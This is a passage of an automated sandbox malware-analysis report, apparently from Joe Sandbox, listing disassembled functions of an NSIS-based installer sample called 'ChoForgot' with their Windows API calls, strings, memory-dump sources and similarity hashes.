                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A3B181B1900209BBDB11AFA1CC85AAF7BB8EF45315F10843BFA05B72D1D77C9A418B59
                                                                                                                                                                                                                                                                                                        Function 00406EFE Relevance: 30.0, APIs: 14, Strings: 3, Instructions: 270filestringCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
                                                                                                                                                                                                                                                                                                        • ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F5C
                                                                                                                                                                                                                                                                                                        • ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FD5
                                                                                                                                                                                                                                                                                                        • lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FE1
                                                                                                                                                                                                                                                                                                        • lstrcmpA.KERNEL32(name,?), ref: 00406FF3
                                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00407212
                                                                                                                                                                                                                                                                                                          • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                          • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2118677582.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118665987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118690991.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118787059.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_ChoForgot.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
                                                                                                                                                                                                                                                                                                        • String ID: %s: failed opening file "%s"$GetTTFNameString$name
                                                                                                                                                                                                                                                                                                        • API String ID: 1916479912-1189179171
                                                                                                                                                                                                                                                                                                        • Opcode ID: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
                                                                                                                                                                                                                                                                                                        • Instruction ID: 0b41acfa2c3272d6dc61f6848418d9961a63ce1f0aee58dce5ac99f5834af97b
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8491CB70D1412DAADF05EBE5C9908FEBBBAEF58301F00406AF592F7290E2385A05DB75
                                                                                                                                                                                                                                                                                                        Function 00406831 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 212stringCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00424170,762323A0,00000000), ref: 00406902
                                                                                                                                                                                                                                                                                                        • GetSystemDirectoryW.KERNEL32(0046E220,00002004), ref: 00406984
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                                                                                                                                        • GetWindowsDirectoryW.KERNEL32(0046E220,00002004), ref: 00406997
                                                                                                                                                                                                                                                                                                        • lstrcatW.KERNEL32(0046E220,\Microsoft\Internet Explorer\Quick Launch), ref: 00406A11
                                                                                                                                                                                                                                                                                                        • lstrlenW.KERNEL32(0046E220,00445D80,?,00000000,00404FD5,00445D80,00000000,00424170,762323A0,00000000), ref: 00406A73
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2118677582.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118665987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118690991.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118787059.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_ChoForgot.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
                                                                                                                                                                                                                                                                                                        • String ID: F$ F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                                                                                                                                                                                        • API String ID: 3581403547-1792361021
                                                                                                                                                                                                                                                                                                        • Opcode ID: 30c92c856c733ebf4e786737c731cc744bbcb1db4e86cdf6d89c5ce8018e8b94
                                                                                                                                                                                                                                                                                                        • Instruction ID: 94ababd57b57874809535cfc920d07d17cc92350817822ff6505e5e4c02fddf3
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 30c92c856c733ebf4e786737c731cc744bbcb1db4e86cdf6d89c5ce8018e8b94
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9E71D6B1A00112ABDF20AF69CC44A7A3775AB55314F12C13BE907B66E0E73C89A1DB59
                                                                                                                                                                                                                                                                                                        Function 004024FB Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 133comCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • CoCreateInstance.OLE32(0040AC30,?,00000001,0040AC10,?), ref: 0040257E
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        • CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2118677582.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118665987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118690991.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118787059.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_ChoForgot.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CreateInstance
                                                                                                                                                                                                                                                                                                        • String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
                                                                                                                                                                                                                                                                                                        • API String ID: 542301482-1377821865
                                                                                                                                                                                                                                                                                                        • Opcode ID: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
                                                                                                                                                                                                                                                                                                        • Instruction ID: 17e7a05f0d3b91d3be5025a92c0a08315d4604efbe7233a371b14ee5b096337f
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9E416E74A00205BFCB04EFA0CC99EAE7B79EF48314B20456AF915EB3D1C679A941CB54
                                                                                                                                                                                                                                                                                                        Function 004079A2 Relevance: .3, Instructions: 347COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2118677582.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118665987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118690991.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118787059.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_ChoForgot.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                        • Opcode ID: 944ebb341680e93427b3a15fa59e4bc843c1d174164c9a0c79530ba1c2ca476e
                                                                                                                                                                                                                                                                                                        • Instruction ID: f621f802e1b16f1afd83cb625a9a5dfb13386b99c5f5a138cca70abed5397206
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 944ebb341680e93427b3a15fa59e4bc843c1d174164c9a0c79530ba1c2ca476e
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CEE17A71D04218DFCF14CF94D980AAEBBB1AF45301F1981ABEC55AF286D738AA41CF95
                                                                                                                                                                                                                                                                                                        Function 0040737E Relevance: .3, Instructions: 303COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2118677582.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118665987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118690991.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118787059.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_ChoForgot.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                        • Opcode ID: 1b88eb350fd00fb33316d24ceb9d72a370f105b0c57197cf1d2e0f134c7777fe
                                                                                                                                                                                                                                                                                                        • Instruction ID: 563abc6a1943806f9f153a5c0538de096a4a033458f435c3a5efc50f2cd88ab2
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1b88eb350fd00fb33316d24ceb9d72a370f105b0c57197cf1d2e0f134c7777fe
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 67C16831A042598FCF18CF68C9805ED7BA2FF89314F25862AED56A7384E335BC45CB85
                                                                                                                                                                                                                                                                                                        Function 004063D8 Relevance: 70.3, APIs: 29, Strings: 11, Instructions: 256libraryloadermemoryCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063EB
                                                                                                                                                                                                                                                                                                        • lstrlenW.KERNEL32(?), ref: 004063F8
                                                                                                                                                                                                                                                                                                        • GetVersionExW.KERNEL32(?), ref: 00406456
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00406057: CharUpperW.USER32(?,0040642D,?), ref: 0040605D
                                                                                                                                                                                                                                                                                                        • LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406495
                                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 004064B4
                                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004064BE
                                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004064C9
                                                                                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 00406500
                                                                                                                                                                                                                                                                                                        • GlobalFree.KERNEL32(?), ref: 00406509
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2118677582.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118665987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118690991.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118787059.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_ChoForgot.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
                                                                                                                                                                                                                                                                                                        • String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
                                                                                                                                                                                                                                                                                                        • API String ID: 20674999-2124804629
                                                                                                                                                                                                                                                                                                        • Opcode ID: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
                                                                                                                                                                                                                                                                                                        • Instruction ID: cf04814c2eceeca0522e3a2239a4cfb7588c45c97b625e8eb28f179f7b3afb0e
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D3919371900219EBDF119FA4CD88AAEBBB8EF04705F11807AE906F7191DB788E51CF59
                                                                                                                                                                                                                                                                                                        Function 004040E4 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 210windowstringCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404199
                                                                                                                                                                                                                                                                                                        • GetDlgItem.USER32(?,000003E8), ref: 004041AD
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004041CA
                                                                                                                                                                                                                                                                                                        • GetSysColor.USER32(?), ref: 004041DB
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041E9
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041F7
                                                                                                                                                                                                                                                                                                        • lstrlenW.KERNEL32(?), ref: 00404202
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040420F
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040421E
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404150,?), ref: 0040400D
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00403FF6: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404150,?), ref: 0040401C
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404150,?), ref: 00404030
                                                                                                                                                                                                                                                                                                        • GetDlgItem.USER32(?,0000040A), ref: 00404276
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000), ref: 0040427D
                                                                                                                                                                                                                                                                                                        • GetDlgItem.USER32(?,000003E8), ref: 004042AA
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042ED
                                                                                                                                                                                                                                                                                                        • LoadCursorW.USER32(00000000,00007F02), ref: 004042FB
                                                                                                                                                                                                                                                                                                        • SetCursor.USER32(00000000), ref: 004042FE
                                                                                                                                                                                                                                                                                                        • ShellExecuteW.SHELL32(0000070B,open,0046E220,00000000,00000000,00000001), ref: 00404313
                                                                                                                                                                                                                                                                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 0040431F
                                                                                                                                                                                                                                                                                                        • SetCursor.USER32(00000000), ref: 00404322
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404351
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404363
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2118677582.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118665987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118690991.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118787059.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_ChoForgot.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
                                                                                                                                                                                                                                                                                                        • String ID: F$N$open
                                                                                                                                                                                                                                                                                                        • API String ID: 3928313111-1104729357
                                                                                                                                                                                                                                                                                                        • Opcode ID: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
                                                                                                                                                                                                                                                                                                        • Instruction ID: b74f7aac3d4bcd21dc7a54326fe4aeb8052e912a1eb6d084c2fa05dc76f75ebb
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5D71B5F1A00209BFDB109F65DD45EAA7B78FB44305F00853AFA05B62E1C778AD91CB99
                                                                                                                                                                                                                                                                                                        Function 00406AC5 Relevance: 35.2, APIs: 15, Strings: 5, Instructions: 163filestringmemoryCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • lstrcpyW.KERNEL32(00465E20,NUL,?,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AD5
                                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AF4
                                                                                                                                                                                                                                                                                                        • GetShortPathNameW.KERNEL32(000000F1,00465E20,00000400), ref: 00406AFD
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00405DE2: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00405DE2: lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24
                                                                                                                                                                                                                                                                                                        • GetShortPathNameW.KERNEL32(000000F1,0046B478,00000400), ref: 00406B1E
                                                                                                                                                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00465E20,000000FF,00466620,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B47
                                                                                                                                                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,0046B478,000000FF,00466C70,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B5F
                                                                                                                                                                                                                                                                                                        • wsprintfA.USER32 ref: 00406B79
                                                                                                                                                                                                                                                                                                        • GetFileSize.KERNEL32(00000000,00000000,0046B478,C0000000,00000004,0046B478,?,?,00000000,000000F1,?), ref: 00406BB1
                                                                                                                                                                                                                                                                                                        • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406BC0
                                                                                                                                                                                                                                                                                                        • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BDC
                                                                                                                                                                                                                                                                                                        • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406C0C
                                                                                                                                                                                                                                                                                                        • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,00467070,00000000,-0000000A,0040A87C,00000000,[Rename]), ref: 00406C63
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                                                                                                                                                                                                                                        • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C77
                                                                                                                                                                                                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 00406C7E
                                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00406C88
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2118677582.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118665987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118690991.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118787059.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_ChoForgot.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                                                                                                                                                                                                                                                                                        • String ID: ^F$%s=%s$NUL$[Rename]$plF
                                                                                                                                                                                                                                                                                                        • API String ID: 565278875-3368763019
